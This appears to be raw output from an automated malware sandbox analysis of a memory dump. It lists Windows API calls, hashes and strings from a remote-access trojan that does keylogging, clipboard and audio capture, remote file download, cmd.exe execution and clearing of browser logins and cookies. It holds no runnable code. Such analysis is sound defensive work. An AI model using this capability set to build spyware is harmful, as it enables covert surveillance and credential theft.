                                            • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                            • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                            • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                            • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                            APIs
                                            • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                            • ShowWindow.USER32(00000009), ref: 00416C9C
                                            • SetForegroundWindow.USER32 ref: 00416CA8
                                              • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                              • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                              • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                            • String ID: !D@
                                            • API String ID: 3446828153-604454484
                                            • Opcode ID: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                            • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                            • Opcode Fuzzy Hash: 4d9bf94020eca6f9e295162147b2deb229949cce80f8bc9c3a6d36dbd144fb99
                                            • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                            APIs
                                            • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID: /C $cmd.exe$open
                                            • API String ID: 587946157-3896048727
                                            • Opcode ID: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                            • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                            • Opcode Fuzzy Hash: df79394fdd2e8ac4c6a51a4d6bf5cb7422c6ad95fc7d3df390015c01fd08e55b
                                            • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                            APIs
                                            • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                            • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: GetCursorInfo$User32.dll
                                            • API String ID: 1646373207-2714051624
                                            • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                            • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                            • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                            • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                            APIs
                                            • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                            • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetLastInputInfo$User32.dll
                                            • API String ID: 2574300362-1519888992
                                            • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                            • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                            • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                            • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free
                                            • String ID:
                                            • API String ID: 269201875-0
                                            • Opcode ID: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                            • Instruction ID: 6f8591e81a910498abf0b0e408487d1c0faf04506bf4bd3dd9e850377c22d226
                                            • Opcode Fuzzy Hash: 439bce076e8af1f4f00d09f36dc57c4360a04deb8f32f7f303546f6c5063276e
                                            • Instruction Fuzzy Hash: 34413931B00104AAEB207B7A9C4666F3AB5DF45735F570A1FFD28C7293DA7C481D426A
                                            APIs
                                            Strings
                                            • [Cleared browsers logins and cookies.], xrefs: 0040C11F
                                            • Cleared browsers logins and cookies., xrefs: 0040C130
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                            • API String ID: 3472027048-1236744412
                                            • Opcode ID: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                            • Instruction ID: 5a72b8a34604a64e244bad04561a930bad76f77e78bf22f3e088d6afb7384554
                                            • Opcode Fuzzy Hash: 857d3cd121560083d8ce3f08402db4584d0000cc5e9f96a8e1a49aed9ab164ab
                                            • Instruction Fuzzy Hash: A431A805648381EDD6116BF514967AB7B824A53748F0882BFB8C4373C3DA7A4808C79F
                                            APIs
                                              • Part of subcall function 0041C5E2: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C5F2
                                              • Part of subcall function 0041C5E2: GetWindowTextLengthW.USER32(00000000), ref: 0041C5FB
                                              • Part of subcall function 0041C5E2: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C625
                                            • Sleep.KERNEL32(000001F4), ref: 0040A5AE
                                            • Sleep.KERNEL32(00000064), ref: 0040A638
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Window$SleepText$ForegroundLength
                                            • String ID: [ $ ]
                                            • API String ID: 3309952895-93608704
                                            • Opcode ID: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                            • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                            • Opcode Fuzzy Hash: 0877f6620f6187a1062b87b3f34e88cc83cbee9ae63c8039862e0d8bb1bff125
                                            • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                            • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                            • Opcode Fuzzy Hash: 911473749be2fa5c2776252735adb4f144d6ecb150fd6d6ba7d991cf4941a2f5
                                            • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                            • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                            • Opcode Fuzzy Hash: b7286f010cda03a875959cf2de4cc99ef12f7635f3b898eb143771747277d2a1
                                            • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                            APIs
                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C543
                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C568
                                            • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E84), ref: 0041C576
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleReadSize
                                            • String ID:
                                            • API String ID: 3919263394-0
                                            • Opcode ID: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                            • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                            • Opcode Fuzzy Hash: 253de0e05f1e183a51722a251bf095503662c065c08e6289a01aaeef394dcb57
                                            • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                            APIs
                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseHandleOpenProcess
                                            • String ID:
                                            • API String ID: 39102293-0
                                            • Opcode ID: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                            • Instruction ID: 82f86893bb8475317186349f6084970b7a3011258d8579340058f5d8518f4318
                                            • Opcode Fuzzy Hash: 81942e7addce2a1bdc39bfb83f2669cd8d6753e4bd6c5855ff2ce9cbe7850470
                                            • Instruction Fuzzy Hash: 9C01F231680215ABD61066949C8AFA7B66C8B84756F0001ABFA08D22A2EF74CD81466A
                                            APIs
                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                              • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                            • _UnwindNestedFrames.LIBCMT ref: 00439911
                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                            • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                            • String ID:
                                            • API String ID: 2633735394-0
                                            • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                            • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                            • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                            • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                            APIs
                                            • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                            • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                            • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                            • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MetricsSystem
                                            • String ID:
                                            • API String ID: 4116985748-0
                                            • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                            • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                            • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                            • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                            APIs
                                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                              • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                            • String ID:
                                            • API String ID: 1761009282-0
                                            • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                            • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                            • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                            • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorHandling__start
                                            • String ID: pow
                                            • API String ID: 3213639722-2276729525
                                            • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                            • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                            • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                            • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F8F
                                            • GetLastError.KERNEL32 ref: 00449FAB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharErrorLastMultiWide
                                            • String ID: PkGNG
                                            • API String ID: 203985260-263838557
                                            • Opcode ID: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                            • Instruction ID: e4919e29a80df6b7ced925805d10dfcffaa1b378e184719e11b938f1b8f94c7b
                                            • Opcode Fuzzy Hash: d1185fb95bfff78fff583c453b007e19375680cfc0f7d37f8e74ebb942ffdfee
                                            • Instruction Fuzzy Hash: 2331E430200201ABFB21EF56C845BAB7768EF45721F15016BF815C7391DB38CD45E7A9
                                            APIs
                                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                            • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Init_thread_footer__onexit
                                            • String ID: [End of clipboard]$[Text copied to clipboard]
                                            • API String ID: 1881088180-3686566968
                                            • Opcode ID: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                            • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                            • Opcode Fuzzy Hash: 7be63757e29b9f91be4cc1fce50211db745ac7e2ddcf3fa0e25e131e1c8bf245
                                            • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                            APIs
                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: ACP$OCP
                                            • API String ID: 0-711371036
                                            • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                            • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                            • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                            • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                            APIs
                                            • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B85B
                                            • GetLastError.KERNEL32 ref: 0044B884
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: PkGNG
                                            • API String ID: 442123175-263838557
                                            • Opcode ID: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                            • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                            • Opcode Fuzzy Hash: 9f33f136d580808b36a549075194831cac44b680ed95d57240af363647088f83
                                            • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                            APIs
                                            • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                            • GetLastError.KERNEL32 ref: 0044B796
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: PkGNG
                                            • API String ID: 442123175-263838557
                                            • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                            • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                            • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                            • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                            APIs
                                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                            Strings
                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LocalTime
                                            • String ID: KeepAlive | Enabled | Timeout:
                                            • API String ID: 481472006-1507639952
                                            • Opcode ID: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                            • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                            • Opcode Fuzzy Hash: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                            • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                            APIs
                                            • Sleep.KERNEL32 ref: 0041667B
                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DownloadFileSleep
                                            • String ID: !D@
                                            • API String ID: 1931167962-604454484
                                            • Opcode ID: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                            • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                            • Opcode Fuzzy Hash: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                            • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                            APIs
                                            • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExistsFilePath
                                            • String ID: alarm.wav$hYG
                                            • API String ID: 1174141254-2782910960
                                            • Opcode ID: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                            • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                            • Opcode Fuzzy Hash: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                            • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                            APIs
                                              • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                              • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                            • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                            • UnhookWindowsHookEx.USER32 ref: 0040B102
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                            • String ID: Online Keylogger Stopped
                                            • API String ID: 1623830855-1496645233
                                            • Opcode ID: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                            • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                            • Opcode Fuzzy Hash: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                            • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                            APIs
                                            • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: String
                                            • String ID: LCMapStringEx$PkGNG
                                            • API String ID: 2568140703-1065776982
                                            • Opcode ID: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                            • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                            • Opcode Fuzzy Hash: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                            • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                            APIs
                                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_20_2_400000_AddInProcess32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: wave$BufferHeaderPrepare
                                            • String ID: XMG
                                            • API String ID: 2315374483-813777761
                                            • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                            • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                            • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                            • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                            APIs
